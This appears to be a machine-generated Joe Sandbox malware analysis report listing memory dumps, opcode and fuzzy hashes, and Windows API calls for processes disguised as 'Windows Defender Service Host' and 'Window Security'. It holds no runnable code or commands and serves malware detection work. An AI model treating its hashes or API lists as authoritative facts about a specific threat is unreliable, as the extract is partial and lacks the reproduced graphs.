                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0ccc8a28f28c53efd961f6b07ec8337f4123f8881a1def6306d66ccabf06c98f
                                                    • Instruction ID: 6154b3a279bdcf705f5132403c5d98871560637b6456bbf54f39646b0acccb03
                                                    • Opcode Fuzzy Hash: 0ccc8a28f28c53efd961f6b07ec8337f4123f8881a1def6306d66ccabf06c98f
                                                    • Instruction Fuzzy Hash: 8231E331E29A499FE744B7B8585A3B9B7E2FF98741F14017AE40DD32C3DE2C98018752
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 601a4fe34b167e805d3b732cacf88c457491a07451b850009cd2d0952f4a4a83
                                                    • Instruction ID: 49c49de018adb7fc8d6353170bfb34a7ba26d2d88a4aebf7d5ccd91b4d5a927a
                                                    • Opcode Fuzzy Hash: 601a4fe34b167e805d3b732cacf88c457491a07451b850009cd2d0952f4a4a83
                                                    • Instruction Fuzzy Hash: 88318FB5A9A6595FD745EF2890E17AA7F71EFC8300F8045A5D80DC37C6CE3D6A008761
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3941e0c5601dfae6669fb68f00386f9a98c77474a7811ae85f4ee9445983ee55
                                                    • Instruction ID: 6b7354054b5a4b34042a17844613d6c89f153f501a3f6fb42d5e17945dbb484e
                                                    • Opcode Fuzzy Hash: 3941e0c5601dfae6669fb68f00386f9a98c77474a7811ae85f4ee9445983ee55
                                                    • Instruction Fuzzy Hash: 3D31C031E1991A9FDB84FB68D4566ADBBF2FF98301F400579C009D32C6DE3DA8018B50
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7cc024718bd50202759e69ae0aba8172a2622420cdfd2ee639120b031e967a7
                                                    • Instruction ID: d36011a617417c3d65ba34f89dcf1e1f29663e908ddf010441893adb5712619c
                                                    • Opcode Fuzzy Hash: d7cc024718bd50202759e69ae0aba8172a2622420cdfd2ee639120b031e967a7
                                                    • Instruction Fuzzy Hash: 2B218B30B1DA495FE788EB2C946A379B2D2EB9C745F0405BEE00EC32D7DE28AC418745
                                                    Memory Dump Source
                                                    • Source File: 0000003A.00000002.2294123883.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_58_2_7ff848f20000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67d87a9e5599e1da40079e21ff7bcb44692b3546770136d027f000f93d2cce47
                                                    • Instruction ID: d5ac3759a9587368b3eec6d69245330d02d53880462f3d36e1dd956c21189734
                                                    • Opcode Fuzzy Hash: 67d87a9e5599e1da40079e21ff7bcb44692b3546770136d027f000f93d2cce47
                                                    • Instruction Fuzzy Hash: 6F01472590DA814FE341B73868555757FF4CFD1391F0804BBE889C70D7ED18A9858396
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aaf2814aff4937a7d8c1bc0333b60c0d79d1cbc5933bd739bef8245d88f3dc8e
                                                    • Instruction ID: 65fee417f29268f693d7aa3d127a446a8881cd7e6c9c758afa531091187e6274
                                                    • Opcode Fuzzy Hash: aaf2814aff4937a7d8c1bc0333b60c0d79d1cbc5933bd739bef8245d88f3dc8e
                                                    • Instruction Fuzzy Hash: 2D52A030A2DA599FE798FB3894592BDB7E2FF98740F440579E00EC32C6DE28AC418745
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^ $O_^"$O_^$
                                                    • API String ID: 0-3242351273
                                                    • Opcode ID: 9dc6fde734266337beadab918741b36b2a6d3cf280e3b6a6d5c1ce6b6f1537be
                                                    • Instruction ID: 906414dcda4c4b344921edaebcf88157f69c63727a945542bac47145f6f4f184
                                                    • Opcode Fuzzy Hash: 9dc6fde734266337beadab918741b36b2a6d3cf280e3b6a6d5c1ce6b6f1537be
                                                    • Instruction Fuzzy Hash: C971397691E1559FD341BB3CA4A51FE3FB0EF80355B8401B6D04ECB387DE2C64069668
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b0f8b960f35724b0eff4f65c429ba00e6cfa3d2f3754f0f6cf22ddd53819386c
                                                    • Instruction ID: ff5b07b28c4cfdf375bcd8aea6a6668ae6831ab97ed48f818c89047aa6f2eead
                                                    • Opcode Fuzzy Hash: b0f8b960f35724b0eff4f65c429ba00e6cfa3d2f3754f0f6cf22ddd53819386c
                                                    • Instruction Fuzzy Hash: 5A712332A1D99A5FE795B73C98162B97BE2EFC9750F0400BAD84DC32D7DE286C428750
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:

                                                    Execution Graph

                                                    Execution Coverage: 10%
                                                    Dynamic/Decrypted Code Coverage: 100%
                                                    Signature Coverage: 0%
                                                    Total number of Nodes: 49
                                                    Total number of Limit Nodes: 6
                                                    [Execution graph rendering (49 nodes) not reproduced. APIs reached on the graph: OleInitialize, CreateActCtxA, DuplicateHandle, FindWindowExA, FindWindowA, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId]

                                                    Control-flow Graph

                                                    [Control-flow graph for the function at 28ad5b0-28ad7bd not reproduced; executed/not-executed node marking lost in extraction. APIs on the graph: GetCurrentProcess, GetCurrentThread, GetCurrentThreadId; internal calls to 28adfa8 and 28adbae]
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Current$Process$Thread
                                                    • String ID:
                                                    • API String ID: 3242834020-0

                                                    Control-flow Graph

                                                    [Control-flow graph for the function at 28ad5f0-28ad7bd not reproduced; executed/not-executed node marking lost in extraction. APIs on the graph: GetCurrentProcess, GetCurrentThread, GetCurrentThreadId; internal calls to 28adfa8 and 28adbae]
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 028AD66E
                                                    • GetCurrentThread.KERNEL32 ref: 028AD6AB
                                                    • GetCurrentProcess.KERNEL32 ref: 028AD6E8
                                                    • GetCurrentThreadId.KERNEL32 ref: 028AD741
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0

                                                    Control-flow Graph

                                                    [Control-flow graph for the function entered at 28ac106 (blocks 28ac0ef-28ac2c3) not reproduced; executed/not-executed node marking lost in extraction. API on the graph: FindWindowExA; internal calls to 28a0224]
                                                    APIs
                                                    • FindWindowExA.USER32(?,?,?,?), ref: 028AC24D
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0

                                                    Control-flow Graph

                                                    [Control-flow graph for the function at 28ac110-28ac2c3 not reproduced; executed/not-executed node marking lost in extraction. API on the graph: FindWindowExA; internal calls to 28a0224]
                                                    APIs
                                                    • FindWindowExA.USER32(?,?,?,?), ref: 028AC24D
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0

                                                    Control-flow Graph

                                                    [Control-flow graph for the function at 28abbca-28abd78 not reproduced; executed/not-executed node marking lost in extraction. API on the graph: FindWindowA; internal calls to 28a0224]
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0

                                                    Control-flow Graph

                                                    [Control-flow graph for the function at 28abbd0-28abd78 not reproduced; executed/not-executed node marking lost in extraction. API on the graph: FindWindowA; internal calls to 28a0224]
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0

                                                    Control-flow Graph

                                                    [Control-flow graph for the function at 28a3346-28a354c not reproduced; executed/not-executed node marking lost in extraction. API on the graph: CreateActCtxA]
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 028A3401
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0

                                                    Control-flow Graph

                                                    [Control-flow graph for the function at 28a1980-28a354c not reproduced; executed/not-executed node marking lost in extraction. API on the graph: CreateActCtxA]
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 028A3401
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 028ADCC7
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 028ADCC7
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 028AE6BD
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: 6a12e87aa2d76660958fb808d5c0b89b350c0b0322da46c872b29423fc8a7dae
                                                    • Instruction ID: a421c46afe4b6c179ac689825f19f3fe7b056bd421c5a07e3298214eaae63ba4
                                                    • Opcode Fuzzy Hash: 6a12e87aa2d76660958fb808d5c0b89b350c0b0322da46c872b29423fc8a7dae
                                                    • Instruction Fuzzy Hash: ED1103B58003488FDB20DFAAD545BDEBFF8EB49320F108469D558A7211D778A544CFA5
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 028AE6BD
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: 6fe19de746c80d3c13cf9ef4239b33b2d771503a494490b4a1d70eaebbf57092
                                                    • Instruction ID: 372ca16f0a87e40a418a5cf20f474d9451b89b941b3160f6da3d4223b5dbf5ce
                                                    • Opcode Fuzzy Hash: 6fe19de746c80d3c13cf9ef4239b33b2d771503a494490b4a1d70eaebbf57092
                                                    • Instruction Fuzzy Hash: FF1133B88003088FDB20DF9EC444B9EBBF8EB48310F108869D518A3211C778A944CFA5
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2597945224.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_e0d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 30dd53097dc8c7d6fbb543ce3e2b9040899337d2517089e41e39126d82b72af5
                                                    • Instruction ID: f30d1c4bbfc8e1aad26c08fc47fcc57084e761b123ba9784f63b8d4fc69d563a
                                                    • Opcode Fuzzy Hash: 30dd53097dc8c7d6fbb543ce3e2b9040899337d2517089e41e39126d82b72af5
                                                    • Instruction Fuzzy Hash: 24212871508204DFCB05DF94DDC0F26BF65FB98328F208569ED095B296C33AD896D7A2
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2597945224.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_e0d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction ID: 1eb78952c91a13511d32142da978e4fb9ad6d501620fca8c663202eddae5f793
                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction Fuzzy Hash: D411D376504240CFCB16CF54D9C4B16BF71FB98328F24C6A9DD091B256C33AD85ACBA2
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 147d0cceb5b794bd4865b00b86e7702c92ecd1f4d762d2ea7723931ce308035e
                                                    • Instruction ID: ff1bdcf086bdeeb5d5ce3b09ac679b4e0e017297a88ae1ae715c17a476c07160
                                                    • Opcode Fuzzy Hash: 147d0cceb5b794bd4865b00b86e7702c92ecd1f4d762d2ea7723931ce308035e
                                                    • Instruction Fuzzy Hash: AB52E130B2DA195FEB98FB3C84552B9B7E2FF98780F440579D44ED32D2DE28A8418741
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: L_^ $L_^"$L_^$
                                                    • API String ID: 0-2518412377
                                                    • Opcode ID: ce15e1bff714ac5258246e35f8bf68b24c08ba19e95aff669f702955ac30a6f7
                                                    • Instruction ID: 48a76023531f74ba898ed305816baec6f35b0117bc3b8e3801c7a32e67eff9bb
                                                    • Opcode Fuzzy Hash: ce15e1bff714ac5258246e35f8bf68b24c08ba19e95aff669f702955ac30a6f7
                                                    • Instruction Fuzzy Hash: 5171353291E55A5FD381BB7CA4A11EB3FB0EF80358F4441B6D5888B293EF2C6506C695
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8f0c6ee000956a2130b1e8e06651cbb95abf239154a38b7766f98e9dd0310bf1
                                                    • Instruction ID: 5c1c4566db14ad4f7b0b779623ce067bfaf0b8bb493504220f0a92198bfdd417
                                                    • Opcode Fuzzy Hash: 8f0c6ee000956a2130b1e8e06651cbb95abf239154a38b7766f98e9dd0310bf1
                                                    • Instruction Fuzzy Hash: 4A713532A0D98A5FE795F77C98562B97BE2EF99650F0400BAD84DD32D3DE286C428341
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 810f27fe2ae73f040134a2a207807e399345787f28a754d3ba395b16973bbd7f
                                                    • Instruction ID: 778f7a8b5ab9339f21f9547496e1a2ac6306841aa9c56f538dad5ff1a7903abe
                                                    • Opcode Fuzzy Hash: 810f27fe2ae73f040134a2a207807e399345787f28a754d3ba395b16973bbd7f
                                                    • Instruction Fuzzy Hash: EF41C232A5AA495FD381FB3CA4A11EA3F71EF84340F8045B6D548C7397DE2DA902C765
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 196772fb10ac88743755aa63debd87c366776b1152b83f7d26ab16b51478cbe6
                                                    • Instruction ID: 50562895ea82808ade932628a029ed396b54660dad2f066e728db900ee86e3d3
                                                    • Opcode Fuzzy Hash: 196772fb10ac88743755aa63debd87c366776b1152b83f7d26ab16b51478cbe6
                                                    • Instruction Fuzzy Hash: 30311230E2990A9FE784B7B8584A3B9B6E1FF98B41F10017AE40DD32D3DE2C98008752
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e707988247b0b93ec43647053c5c9c1956c5d61d3e67f7b6be89ce3ac746c3f7
                                                    • Instruction ID: 752cb0fe77a83b83886f1c36400ed4e301b342c3ed229444b9381af3918248cd
                                                    • Opcode Fuzzy Hash: e707988247b0b93ec43647053c5c9c1956c5d61d3e67f7b6be89ce3ac746c3f7
                                                    • Instruction Fuzzy Hash: 6131AF31A9AA495FD381EB2C90B16AB7F71FF88300F8045A5D949C3397DE3DAA01C761
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f16c5652ab0d5ae67496a4c8f740683991c3927d04e5107c7d788a29ab503ff
                                                    • Instruction ID: 859e76df4a045c95eb24d5c53d4a617c29e7d88b50a1b7e1eb21cafbf79ca30d
                                                    • Opcode Fuzzy Hash: 4f16c5652ab0d5ae67496a4c8f740683991c3927d04e5107c7d788a29ab503ff
                                                    • Instruction Fuzzy Hash: 40319E31A1990A9FDB84FB68C4656BEBBF2FF98301F500579D409E3286DE3CA841CB54
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4c972bd985fe35e62aea8c1c74e77a8169013e29a82733df95e454e7774a048e
                                                    • Instruction ID: a9691a057d27ed17a381b598bcaa1550d8c4ea782ce8e90b4cc99b900bc2a15f
                                                    • Opcode Fuzzy Hash: 4c972bd985fe35e62aea8c1c74e77a8169013e29a82733df95e454e7774a048e
                                                    • Instruction Fuzzy Hash: A5218D30B1D9594FE788EB2C946A379B2D2EB9C745F0405BEE00EC32D7DE689C418745
                                                    Memory Dump Source
                                                    • Source File: 0000005C.00000002.2708355608.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_92_2_7ff848f40000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6222dac3b0682fc27faa2213d70e7e9e68fc3ef8d03c6d9795e2e1e8f6a569b5
                                                    • Instruction ID: 2a7054317e9ffe28c8bce71eff5a6150b12ec7361fd291b0cb9bbf053b5650fc
                                                    • Opcode Fuzzy Hash: 6222dac3b0682fc27faa2213d70e7e9e68fc3ef8d03c6d9795e2e1e8f6a569b5
                                                    • Instruction Fuzzy Hash: 89014C2590D6910FF351B33858264767FE4CFA5791F0804FBD8C9D71E7ED1899858392

                                                    Execution Graph

                                                    Execution Coverage: 10.1%
                                                    Dynamic/Decrypted Code Coverage: 100%
                                                    Signature Coverage: 0%
                                                    Total number of Nodes: 68
                                                    Total number of Limit Nodes: 5

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0258D66E
                                                    • GetCurrentThread.KERNEL32 ref: 0258D6AB
                                                    • GetCurrentProcess.KERNEL32 ref: 0258D6E8
                                                    • GetCurrentThreadId.KERNEL32 ref: 0258D741
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: f3459ce51985da1016b2177689cdb39d28bfff484585e16bc53d7cc6e9bf7529
                                                    • Instruction ID: 9ebdd1a2c22c5fce1b46e58b91b8f402f4b8e25c59e7fb9314e6092c7d4dadd7
                                                    • Opcode Fuzzy Hash: f3459ce51985da1016b2177689cdb39d28bfff484585e16bc53d7cc6e9bf7529
                                                    • Instruction Fuzzy Hash: A65156B09013498FDB14EFAAD648BAEBFF5FF49304F20C459E009A72A0D7789944CB65

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0258D66E
                                                    • GetCurrentThread.KERNEL32 ref: 0258D6AB
                                                    • GetCurrentProcess.KERNEL32 ref: 0258D6E8
                                                    • GetCurrentThreadId.KERNEL32 ref: 0258D741
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: a04fedc4ad4be4dd2ba02e112f0cf4ebbd4cc236ed1d286b802d63e1a6c1e0c9
                                                    • Instruction ID: 9305f648cb3dd6224c06dfe7cf0a90361886ae72f5afed1abd6e5265a29b04b0
                                                    • Opcode Fuzzy Hash: a04fedc4ad4be4dd2ba02e112f0cf4ebbd4cc236ed1d286b802d63e1a6c1e0c9
                                                    • Instruction Fuzzy Hash: 225146B09013098FDB14EFAAD648BAEBBF5FF49314F20C459D409A73A0D7785944CB65

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0258D66E
